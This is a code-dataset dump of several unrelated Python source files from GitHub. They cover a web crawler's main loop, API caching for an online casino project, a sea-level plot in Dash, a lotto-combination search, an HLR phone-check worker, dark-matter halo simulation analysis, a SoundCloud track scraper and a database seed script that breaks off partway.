if urlsScrappedInSession >= maxUrlsToScrapInSession:\n break\n url_to_scrap = url_object.address\n keywords_found_on_this_page, page_title, page_description, iconLink, urls_found_on_this_page, category = scrap(url_to_scrap)\n if (keywords_found_on_this_page, urls_found_on_this_page) == (None, None):\n print(\"[ - ] Skipping URL: {0}\".format(url_to_scrap))\n continue\n store(url_to_scrap, keywords_found_on_this_page, urls_found_on_this_page, page_title, page_description, iconLink, category)\n urlsScrappedInSession += 1\n print(\"[ + ] Crawled ({0}/{1}) URL: {2}\".format(urlsScrappedInSession,maxUrlsToScrapInSession,url_to_scrap))\n\n print(\"\\n-------------------------------------------\")\n print(\"[ + ] Total Keywords string in Database: \", Keywords.objects.count())\n print(\"[ + ] Total URLs present in Database: \",Urls.objects.count())\n print(\"[ + ] Total URLs crawled: \",Urls.objects.exclude(last_scrapped = datetime.datetime.min).count())","repo_name":"coderGtm/Talaash","sub_path":"core/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":12355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71436278009","text":"# from urllib.request import Request, urlopen\nimport sqlite3\nimport json\nimport time\nimport os\nimport urllib.request\n\n# rickandmorty_apitodict() this only needs to be called once.\n# the resulting file should be uploaded to github as a static file which we can pull from\n\n# create a csv file and a function to read from the api and write to the csv file.\n# use the above function to read from said file and create the database instead of directly requesting from the API\n# this speeds things up instead of taking 20-30 seconds every time\n\ndef get_and_store_RandMcharacters():\n \"\"\"\n Gets information on every character from Rick and Morty.\n The data is stored in the \"data\" directory as a JSON file.\n The JSON file is an array of array. The nested array data is ordered as followed:\n 0: id of character\n 1: name of character\n 2: image link for character\n \"\"\"\n count = 493 # this is the total number of characters in rick and morty\n page = 1\n data = {}\n data['characters'] = []\n while count > 0:\n request = urllib.request.urlopen(\"https://rickandmortyapi.com/api/character/?page=\" + str(page))\n response = request.read()\n result = json.loads(response)\n # Use a for loop to add every element to the database\n for i in result['results']:\n data['characters'].append({\n 'name' : i['name'],\n 'image_link' : i['image']\n })\n count -= 1\n page += 1\n with open('data/rickandmortydata.json', 'w') as outfile:\n json.dump(data, outfile)\n print(\"Got character info and cached into data/rickandmortydata.json\")\n\ndef enter_database():\n \"\"\"\n Gets first generation pokemon and all the types (even those not in first generation) to store on the database.\n The first time this function is called, the API data receieved will be cached in the \"data\" directory. Sequential\n calls to this function will use the cached data instead.\n\n Make sure the database has been created before this is called.\n \"\"\"\n database = sqlite3.connect(\"data/database.db\")\n c = database.cursor()\n\n # rick and morty data\n if not os.path.exists(\"data/rickandmortydata.json\"):\n get_and_store_RandMcharacters()\n with open('data/rickandmortydata.json') as json_file: # change this to not use database_query fucntion\n data = json.load(json_file)\n for i in data['characters']:\n c.execute(\"INSERT INTO rickandmorty(full_name, image_link) VALUES (?, ?)\", (i['name'], i['image_link']))\n\n database.commit()\n database.close()\n\n\ndef initialize():\n enter_database()\n","repo_name":"aolteanu00/Online-Casino","sub_path":"data/rick_and_morty.py","file_name":"rick_and_morty.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30956944299","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom django_plotly_dash import DjangoDash\nimport pandas as pd\nimport plotly.express as px\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = DjangoDash(\"sealevelrise\", external_stylesheets=external_stylesheets)\n\n# Data preparation & reading:\n\n# Giving names to dataframe columns\ncolumn_names = ['type', '#', 'decimal', 'num of obs',\n 'obs1', 'obs2', 'obs3', 'obs4',\n 'obs5', 'obs6', 'obs7', 'obs8']\n\n# Skip first 47 row comments when reading the data\ndf = pd.read_csv('GoGreen/static/Media/data/GMSL_TPJAOS_5.1_199209_202203.txt',\n names=column_names, header=0, delimiter='\\s+', skiprows=47)\n\n# 1. Get first 4 char from the column year and put it into new column named Year:\n# df['Year'] = df['decimal'].astype(str).str[:4]\n# 2. Grouping the dataframe by year and get the last row from each group:\n# df2 = df.groupby('Year', as_index=False).last()\nfig = px.line(df, x=df['decimal'], y=df['obs8'])\n\n\nfig.update_layout(xaxis=dict(\n title='Year',\n showgrid=False,\n),\n yaxis=dict(\n title='Sea Level Change(mm)',\n showgrid=True,\n gridcolor='#DCDCDC',\n gridwidth=1,\n ),\n paper_bgcolor='#FFFFFF',\n plot_bgcolor='#FFFFFF')\n\nfig.update_yaxes(zeroline=True, zerolinewidth=1, zerolinecolor='#DCDCDC')\nfig.update_layout(hovermode=\"x unified\")\nfig.update_traces(hovertemplate=\"
\".join([\n \"%{y} mm\",\n \"\"\n ])\n)\n\n\napp.layout = html.Div([\n html.Div([dcc.Graph(id='graph', figure=fig)])\n])\n\n\n\n","repo_name":"ekinsuaydin/ClimateChangeApp","sub_path":"GoGreen/dash_apps/finished_apps/sealevelrise.py","file_name":"sealevelrise.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574194687","text":"import sys\r\nsys.setrecursionlimit(10**4)\r\ninput = sys.stdin.readline\r\n\r\ndef dfs(arr,temp,idx):\r\n global k\r\n global visited\r\n if len(temp) == 6:\r\n print(*temp)\r\n return\r\n if idx > len(arr):\r\n return\r\n if len(temp) + len(arr) - idx + 1 < 6 :\r\n return\r\n for i in range(idx,len(arr)):\r\n dfs(arr, temp + [arr[i]],i + 1)\r\n\r\n\r\n # 현재 idx 를 넣는경우 안넣는경우\r\n\r\n\r\n\r\nwhile 1:\r\n arr = list(map(int,input().split()))\r\n visited = [0]*len(arr)\r\n if arr[0] == 0 :break\r\n k = arr[0]\r\n dfs(arr,[],1)\r\n print()\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/6603. 로또/로또.py","file_name":"로또.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73810485047","text":"import check_phone.hlr_api as hlr\nfrom check_phone.models import Request, Requests\n\n\ndef worker(requests_id):\n requests = Requests.objects.get(id=requests_id)\n requests_phone = Request.objects.all().filter(requests_id=requests.id)\n status = {}\n for req in requests_phone:\n r = Request.objects.filter(phone=req.phone).first()\n if r is None or r.hlr_status_code == 5:\n hlr_server_id = hlr.send_hlr(req.phone)\n if hlr_server_id is not None:\n status_code = hlr.get_hlr_result(hlr_server_id)\n if status_code == -2:\n status = 'Неправильный номер'\n if status_code == -1:\n status = 'Номер не обсуживается'\n if status_code == -0:\n status = 'Запрос принят'\n if status_code == 1:\n status = 'Запрос передан оператору'\n if status_code == 2:\n status = 'Номер обсуживается'\n Request.objects.filter(id=req.id).update(hlr_status=status, hlr_status_code=status_code)\n else:\n Request.objects.filter(id=req.id).update(hlr_status=\"Ошибка\")\n else:\n Request.objects.filter(id=req.id).update(hlr_status=r.hlr_status, hlr_status_code=r.hlr_status_code)\n","repo_name":"MojsaKirill/hlr","sub_path":"check_phone/hlr_theard.py","file_name":"hlr_theard.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36350426648","text":"import h5py\nimport numpy as np\nfrom pylab import *\nimport matplotlib.pyplot as plt\nimport scipy.stats as stat\nfrom scipy.optimize import curve_fit\n\ndef logfunc(x,rc):\n # Hernquist profile #\n M = 1e14\n a = 225\n beta = 4.\n f = np.log10(M)-np.log10(2.*np.pi)\n f += np.log10(a)-(1./beta)*np.log10((10**x)**beta + rc**beta)\n f -= 3.*np.log10(10**x+a)\n return f\n\ndef func(x,M,a):\n # Hernquist profile #\n f = M-np.log10(2.*np.pi)+a-x-3.*np.log10(10**x+10**a)\n return f\n\ndef bin_volumes(radial_bins):\n \"\"\"Returns the volumes of the bins. \"\"\"\n\n single_vol = lambda x: (4.0 / 3.0) * np.pi * x ** 3\n outer = single_vol(radial_bins[1:])\n inner = single_vol(radial_bins[:-1])\n return outer - inner\n\n\ndef bin_centers(radial_bins):\n \"\"\"Returns the centers of the bins. \"\"\"\n\n outer = radial_bins[1:]\n inner = radial_bins[:-1]\n return 0.5 * (outer + inner)\n\n\ndef fit_profile(file, radial_bins, centers):\n\n sim = h5py.File(file, \"r\")\n pos = sim[\"/PartType1/Coordinates\"][:, :]\n mass = sim[\"/PartType1/Masses\"][:] * 1e10\n num = len(mass)\n\n # Geometry info\n boxsize = sim[\"/Header\"].attrs[\"BoxSize\"]\n center = boxsize / 2.0\n\n # Radial coordinates [kpc units]\n r = np.sqrt(np.sum((pos - center) ** 2, axis=1))\n\n SumMasses, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)) * mass[0], statistic=\"sum\", bins=radial_bins, )\n NumParts, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)), statistic=\"sum\", bins=radial_bins, )\n density = (SumMasses / bin_volumes(radial_bins)) # Msun/kpc^3\n\n select = np.where((NumParts > 5) & (centers < 1e3))[0]\n xdata = np.log10(centers[select])\n ydata = np.log10(density[select])\n\n # Doing fit #\n popt, pcov = curve_fit(func, xdata, ydata)\n\n M = popt[0]\n rs = 10 ** popt[1]\n return M, rs, num\n\n\ndef read_simulation(folder, snap):\n\n snap_list = np.arange(0,snap,1)\n\n # Define radial bins [log scale, kpc units]\n radial_bins = np.arange(0, 5, 0.1)\n radial_bins = 10 ** radial_bins\n centers = bin_centers(radial_bins) # kpc\n\n # Fit density profile\n M, rs, n_parts = fit_profile(folder+\"/halo_0000.hdf5\", radial_bins, centers)\n\n n_snaps = len(snap_list)\n density_in_bin_per_snap = np.zeros((len(centers), n_snaps))\n velocity_in_bin_per_snap = np.zeros((len(centers), n_snaps))\n\n time = np.zeros(n_snaps)\n core = np.zeros(n_snaps)\n old_time = 0\n\n # Only follow scatter, probability and radius for first ten snaps e.g.\n n_snap_s = 10\n\n # Table containing positions of particle's collisions and time\n n_collisions = np.zeros((n_parts, n_snap_s))\n n_positions = np.zeros((n_parts, n_snap_s))\n\n scatter_rate_per_bin = np.zeros((len(centers), n_snap_s))\n probability_per_bin = np.zeros((len(centers), n_snap_s))\n search_radius_per_bin = np.zeros((len(centers), n_snap_s))\n\n i = 1\n for ii in snap_list:\n\n sim = h5py.File(folder + \"/halo_%04d.hdf5\" % ii, \"r\")\n pos = sim[\"/PartType1/Coordinates\"][:, :]\n mass = sim[\"/PartType1/Masses\"][:] * 1e10\n vel = sim[\"/PartType1/Velocities\"][:, :]\n if ii < n_snap_s:\n nsidm = sim[\"/PartType1/SIDM_events\"][:]\n ids = sim[\"/PartType1/ParticleIDs\"][:]\n prob = sim[\"/PartType1/SIDM_probability\"][:]\n h = sim[\"/PartType1/SIDM_search_radius\"][:]\n timestep = sim[\"/PartType1/Time_step_size\"][:]\n prob *= timestep\n\n # Read units\n unit_length_in_cgs = sim[\"/Units\"].attrs[\"Unit length in cgs (U_L)\"]\n unit_time_in_cgs = sim[\"/Units\"].attrs[\"Unit time in cgs (U_t)\"]\n\n # Geometry info\n boxsize = sim[\"/Header\"].attrs[\"BoxSize\"]\n center = boxsize / 2.0\n\n #Time info\n t = sim[\"/Header\"].attrs[\"Time\"] * 0.979 #Gyr\n time[i-1] = t\n delta_time = t - old_time\n old_time = t\n\n # Radial coordinates [kpc units]\n r = np.sqrt(np.sum((pos - center) ** 2, axis=1))\n\n SumMasses, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)) * mass[0], statistic=\"sum\",\n bins=radial_bins, )\n density = (SumMasses / bin_volumes(radial_bins)) # Msun/kpc^3\n density_in_bin_per_snap[:, i-1] = density\n\n # Doing fit #\n select = np.where( (centers>4) & (centers<1e4) )[0]\n popt, pcov = curve_fit(logfunc, np.log10(centers[select]), np.log10(density[select]))\n core[i-1] = popt[0]\n\n # Check 1D velocity dispersion\n vel *= unit_length_in_cgs / unit_time_in_cgs # cm/s\n vel *= 1e-5 # km/s\n\n std_vel_x, _, _ = stat.binned_statistic(x=r, values=vel[:, 0], statistic=\"std\", bins=radial_bins, )\n std_vel_y, _, _ = stat.binned_statistic(x=r, values=vel[:, 1], statistic=\"std\", bins=radial_bins, )\n std_vel_z, _, _ = stat.binned_statistic(x=r, values=vel[:, 2], statistic=\"std\", bins=radial_bins, )\n std_vel = np.sqrt(std_vel_x ** 2 + std_vel_y ** 2 + std_vel_z ** 2) / np.sqrt(3.)\n velocity_in_bin_per_snap[:, i-1] = std_vel\n\n if i < n_snap_s:\n ids_sorted = np.argsort(ids)\n r = r[ids_sorted]\n nsidm = nsidm[ids_sorted]\n prob = prob[ids_sorted]\n part_h = h[ids_sorted]\n\n n_collisions[:, i - 1] = nsidm\n n_positions[:, i - 1] = r\n\n for j in range(0, len(radial_bins) - 1):\n\n select = np.where((n_positions[:, i - 1] >= radial_bins[j]) &\n (n_positions[:, i - 1] < radial_bins[j + 1]))[0]\n\n num_parts = len(select)\n if num_parts > 1:\n\n if i == 1: num_collisions = np.sum(n_collisions[select, i - 1])\n if i > 1: num_collisions = np.sum(n_collisions[select, i - 1]) - np.sum(n_collisions[select, i - 2])\n if num_collisions > 0: scatter_rate_per_bin[j, i - 1] = num_collisions / (delta_time * num_parts)\n probability_per_bin[j, i - 1] = np.median(prob[select])\n search_radius_per_bin[j, i - 1] = np.median(part_h[select])\n\n i += 1 # update counter\n\n\n density = np.zeros((len(centers), 5))\n velocity = np.zeros((len(centers), 5))\n density[:,0] = np.mean(density_in_bin_per_snap[:, 0:2], axis=1)\n density[:,1] = np.mean(density_in_bin_per_snap[:, 8:12], axis=1)\n density[:,2] = np.mean(density_in_bin_per_snap[:, 18:22], axis=1)\n density[:,3] = np.mean(density_in_bin_per_snap[:, 38:42], axis=1)\n #density[:,4] = np.mean(density_in_bin_per_snap[:, 78:82], axis=1)\n velocity[:,0] = np.mean(velocity_in_bin_per_snap[:, 0:2], axis=1)\n velocity[:,1] = np.mean(velocity_in_bin_per_snap[:, 8:12], axis=1)\n velocity[:,2] = np.mean(velocity_in_bin_per_snap[:, 18:22], axis=1)\n velocity[:,3] = np.mean(velocity_in_bin_per_snap[:, 38:42], axis=1)\n #velocity[:,4] = np.mean(velocity_in_bin_per_snap[:, 78:82], axis=1)\n\n scatter_rate = np.mean(scatter_rate_per_bin[:, 0:i], axis=1)\n probability = np.mean(probability_per_bin[:, 0:i], axis=1)\n search_radius = np.mean(search_radius_per_bin[:, 0:i], axis=1)\n\n return centers, density, velocity, scatter_rate, probability, search_radius, time, core\n\n\ndef plot_core_evolution(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n #plt.axis([1e9, 1e15, 1, 20])\n plt.xlabel(\"Time [Gyr]\")\n plt.ylabel(\"Core Radius [kpc]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"core_evolution.png\", dpi=200)\n plt.close()\n\n\ndef plot_probability(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-4,1e0])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Probability\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"probability.png\", dpi=200)\n plt.close()\n\ndef plot_scatter_rate(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-4, 1e2])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Scatter rate [particle$^{-1}$ Gyr$^{-1}$]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"scatter_rate.png\", dpi=200)\n plt.close()\n\ndef plot_search_radius(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-2,1e2])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Search radius [kpc]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"search_radius.png\", dpi=200)\n plt.close()\n\n\ndef plot_profile_evolution(x, rho, vel):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (7, 3),\n \"figure.subplot.left\": 0.1,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.35,\n \"figure.subplot.hspace\": 0.25,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 2, 1)\n plt.grid(\"True\")\n\n plt.plot(x, rho[:,0], '-', color='tab:blue',label='t = 0 Gyr')\n plt.plot(x, rho[:,1], '-', color='tab:orange',label='t = 1 Gyr')\n plt.plot(x, rho[:,2], '-', color='tab:green',label='t = 2 Gyr')\n plt.plot(x, rho[:,3], '-', color='tab:red',label='t = 4 Gyr')\n #plt.plot(x, rho[:,4], '-', color='tab:purple',label='t = 8 Gyr')\n\n plt.axis([1e0,1e3, 1e5, 1e9])\n plt.xscale('log')\n plt.yscale('log')\n\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Density [M$_{\\odot}$/kpc$^{3}$]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.legend(labelspacing=0.2, handlelength=1.5, handletextpad=0.4, frameon=False)\n\n ax = plt.subplot(1, 2, 2)\n plt.grid(\"True\")\n\n plt.plot(x, vel[:,0], '-', color='tab:blue',label='t = 0 Gyr')\n plt.plot(x, vel[:,1], '-', color='tab:orange',label='t = 1 Gyr')\n plt.plot(x, vel[:,2], '-', color='tab:green',label='t = 2 Gyr')\n plt.plot(x, vel[:,3], '-', color='tab:red',label='t = 4 Gyr')\n #plt.plot(x, vel[:,4], '-', color='tab:purple',label='t = 8 Gyr')\n\n plt.axis([1e0, 1e3, 0, 600])\n plt.xscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Velocity dispersion [km/s]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"profile_evolution.png\", dpi=200)\n plt.close()\n\nif __name__ == '__main__':\n from utils import *\n\n output_path = args.output\n folder = args.directory\n snapshot = args.snapshot\n\n centers, density, velocity, \\\n scatter_rate, probability, \\\n search_radius, time, core = read_simulation(folder, snapshot)\n\n plot_profile_evolution(centers, density, velocity)\n plot_core_evolution(time, core)\n plot_probability(centers, probability)\n plot_scatter_rate(centers, scatter_rate)\n plot_search_radius(centers, search_radius)\n","repo_name":"correac/SIDMPlots","sub_path":"prev/IsolatedHalo.py","file_name":"IsolatedHalo.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3368624416","text":"\n# -*- coding: utf-8 -*-\nfrom locale import *\nimport sys,os\n\nproject_dir = '../tr/tr/'\n\nsys.path.append(project_dir)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\nimport django\ndjango.setup()\n\nimport soundcloud\nfrom music.models import *\nfrom datetime import datetime, date, time\n\n\nclient = soundcloud.Client(client_id='dce5652caa1b66331903493735ddd64d')\npage_size = 200\ngenres_list = SoundGenres.objects.values('name')\ngenres_list_names = [name['name'] for name in genres_list]\n\nг_rus_list_1 = [\n\"Габриэль\",\n\"Гаврик & Олександр Положинський\",\n\"ГадЖеТы\",\n\"Гайдай\",\n\"Гайдамаки\",\n\"Гайк\",\n\"Гайтана\",\n\"Галактика\",\n\"Галамарт\",\n\"Галамартовна\",\n\"Галина\",\n\"Галина Боб\",\n\"Галина Журавлёва (Журга)\",\n\"Галина Комиссарова\",\n\"Галина Комиссарова и Михаил Кармаш\",\n\"Галина Ненашева\",\n\"Галина Хомчик\",\n\"Галина Шапкина\",\n\"Галина Юдина\",\n\"Галя Боб\",\n\"Галя Журавлёва\",\n\"Галямин Сергей feat. Samoel\",\n\"Гамора\",\n\"Ганвест\",\n\"Гансэлло\",\n\"Гардемарины Вперед\",\n\"Гари Гудини feat. M.J. Marley (Стиль Бандит)\",\n\"Гарик Кричевский\",\n\"Гарик Мошенник & DJ Favorite\",\n\"Гарик Погорелов\",\n\"Гарик Сукачёв\",\n\"Гарик-Ниагарик\",\n\"Гармония\",\n\"Гарри Польский\",\n\"Гарри Топор\",\n\"Гаррий Манукян\",\n\"Гаттака\",\n\"Гаяне Аракелян\",\n\"Гейдар Багиров\",\n\"Гела Гуралиа\",\n\"Гельдуш Османов\",\n\"Гена Гром\",\n\"Гена Селезнев\",\n\"Геннадий Белов\",\n\"Геннадий Виноградов\",\n\"Геннадий Витер\",\n\"Геннадий Вяземский\",\n\"Геннадий Гладков\",\n\"Геннадий Горелик\",\n\"Геннадий Жаров\",\n\"Геннадий Иванцов\",\n\"Геннадий Лясковский\",\n\"Геннадий Парыкин\",\n\"Геннадий Пугачев\",\n\"Геннадий Ура\",]\n\nг_rus_list_2 = [\n\"Георгий Колдун\",\n\"Георгий Лысенко\",\n\"Георгий Свиридов\",\n\"Гера Герасимов\",\n\"Гера Грач\",\n\"Геракл\",\n\"Герб feat. DJ Jedy\",\n\"Герман Грач\",\n\"Герман Титов\",\n\"Герман Чепелянский\",\n\"Герман Черных\",\n\"Герои\",\n\"Герои и Belka\",\n\"Герои Комиксов\",\n\"Герр Антон\",\n\"Гетман\",\n\"ГЕЦе\",\n\"Гига\",\n\"Гильzа\",\n\"Главная Роль\",\n\"Гладков Григорий\",\n\"Глаза\",\n\"Гламур\",\n\"Глеб Матвейчук\",\n\"Глюк’oza\",\n\"Глюкоzа\",\n\"Глюкоза\",\n\"Гоголь-Моголь\",\n\"Год Змеи\",\n\"Голди\",\n\"Голод\",\n\"Голубые Береты\",\n\"Гордей Белов\",\n\"Город 312\",\n\"Горшенев\",\n\"Горячие головы\",\n\"Горячий Шоколад\",\n\"Горячий шоколад и Тринити\",\n\"Гослинг\",\n\"Гости Из Будущего\",\n\"Гостья из будущего\",\n\"Гоша Style\",\n\"Гоша Грачевский\",\n\"Гоша Куценко\",\n\"Гоша Матарадзе\",\n\"гр LIFE\",\n\"гр. Бумер\",\n\"гр. Пропорции feat. Кэти Эбель\",\n\"Градусы\",\n\"Гранат\",\n\"Гранды\",\n\"Граф Гагарин\",\n\"Гребенщиков Михаил\",\n\"Грейс\",\n\"Гречка\",\n\"Грешник\",\n\"Грибы\",\n\"Григ\",\n\"Григорий Герасимов\",\n\"Григорий Гладков\",\n\"Григорий Данской\",\n\"Григорий Есаян\",\n\"Григорий Лепс\",\n\"Григорий Филь\",\n\"Григорий Юрченко\",\n\"Грин Данилов\",\n\"Гринджоли\",\n\"Гринс��рин\",\n\"Гриша Гост & Глеб Калюжный\",\n\"Гриша Заречный\",\n\"Гриша Петров\",\n\"Грозовой Перевал\",\n\"Грот\",\n\"Грузман\",\n\"Группа 5 Плюс\",]\n\nг_rus_list_3 = [\n\"Группа F1\",\n\"Группа Ferramon\",\n\"Группа Fm\",\n\"Группа H2O\",\n\"Группа PLAY\",\n\"Группа Radио\",\n\"Группа А.Т.А.С.\",\n\"Группа Аня\",\n\"Группа Братва\",\n\"Группа Весна\",\n\"Группа Владимир\",\n\"Группа Евразия\",\n\"Группа Запретка\",\n\"Группа Колыма\",\n\"Группа Круче Тучи\",\n\"Группа Крылья\",\n\"Группа Купажъ\",\n\"Группа Лиц\",\n\"Группа Маша Пирожкова\",\n\"Группа Мира\",\n\"Группа Мишель\",\n\"Группа Мурkiss\",\n\"Группа Навстречу Солнцу\",\n\"Группа Одесса\",\n\"Группа Олега Ястребова\",\n\"Группа Онлайн\",\n\"Группа Опаньки\",\n\"Группа Панама\",\n\"Группа ПМ\",\n\"Группа Порт Петровск\",\n\"Группа Р\",\n\"Группа Регион 42 & Александр Кузнецов\",\n\"Группа РЭДЛ?\",\n\"Группа Ряженка\",\n\"Группа Самоцветы\",\n\"Группа Санкции\",\n\"Группа Сентябрь\",\n\"Группа Стаса Намина\",\n\"Группа Улицы\",\n\"Группа Централ\",\n\"Гузель Уразова\",\n\"Гузель Хасанова\",\n\"Гульназ\",\n\"Гурмэ\",\n\"Гурченко and Dj Грув\",\n\"Гусейн Гасанов\",\n\"Гюльназ Гаджикурбанова\",\n]\n\n\n\nlitera = SoundSymbol.objects.get(name=\"Г\")\n\ncount = 0\n\nfor tag in г_rus_list_1:\n tracks = client.get('/tracks', q=tag, limit=page_size, linked_partitioning=1)\n if tracks:\n for track in tracks.collection:\n created_at = track.created_at\n created_at = datetime.strptime('Jun 1 2005 1:33PM', '%b %d %Y %I:%M%p')\n if track.description:\n description = track.description[:500]\n else:\n description=None\n try:\n Music.objects.get(id=track.id)\n except:\n if track.genre and track.release_year and track.duration > 90000 and track.genre in genres_list_names:\n try:\n self_tag = SoundTags.objects.get(name=tag, symbol=litera)\n except:\n self_tag = SoundTags.objects.create(name=tag, symbol=litera)\n genre =SoundGenres.objects.get(name=track.genre.replace(\"'\", '') )\n new_track = Music.objects.create(id=track.id, tag=self_tag, artwork_url=track.artwork_url, created_at=created_at, duration=track.duration, genre=genre, description=description, title=track.title, uri=track.uri, release_year=track.release_year)\n count = count + 1\n while tracks.next_href != None and count < 2000:\n tracks = client.get(tracks.next_href, limit=page_size, linked_partitioning=1)\n for track in tracks.collection:\n created_at = track.created_at\n created_at = datetime.strptime('Jun 1 2005 1:33PM', '%b %d %Y %I:%M%p')\n if track.description:\n description = track.description[:500]\n else:\n description=None\n try:\n Music.objects.get(id=track.id)\n except:\n if track.genre and track.release_year and track.duration > 90000 and track.genre in genres_list_names:\n try:\n self_tag = SoundTags.objects.get(name=tag, symbol=litera)\n except:\n self_tag = SoundTags.objects.create(name=tag, symbol=litera)\n genre =SoundGenres.objects.get(name=track.genre.replace(\"'\", '') )\n new_track = Music.objects.create(id=track.id, tag=self_tag, artwork_url=track.artwork_url, created_at=created_at, duration=track.duration, genre=genre, description=description, title=track.title, uri=track.uri, release_year=track.release_year)\n count = count + 1\n","repo_name":"interesnij/django-social-network","sub_path":"common/parsing_soundcloud/rus/parsing_г_rus.py","file_name":"parsing_г_rus.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40579259982","text":"from app.models import db, Hit, Text\n\ndef seed_hits():\n\n text_1 = Text.query.get(1).content\n text_2 = Text.query.get(2).content\n loc_1 = text_2.index('salvation')\n loc_2 = text_2.index('faith')\n loc_3 = text_2.index('faith', loc_2+1)\n\n hits = [\n Hit(\n text_id=1,\n key_id=1,\n claim_id=1,\n location=text_1.index('test'),\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=3,\n claim_id=2,\n location=loc_1,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=3,\n claim_id=2,\n location=text_2.index('salvation', loc_1+1),\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=loc_2,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=loc_3,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=text_2.index('faith', loc_3+1),\n word_count=1,\n created_by=1,\n ),\n 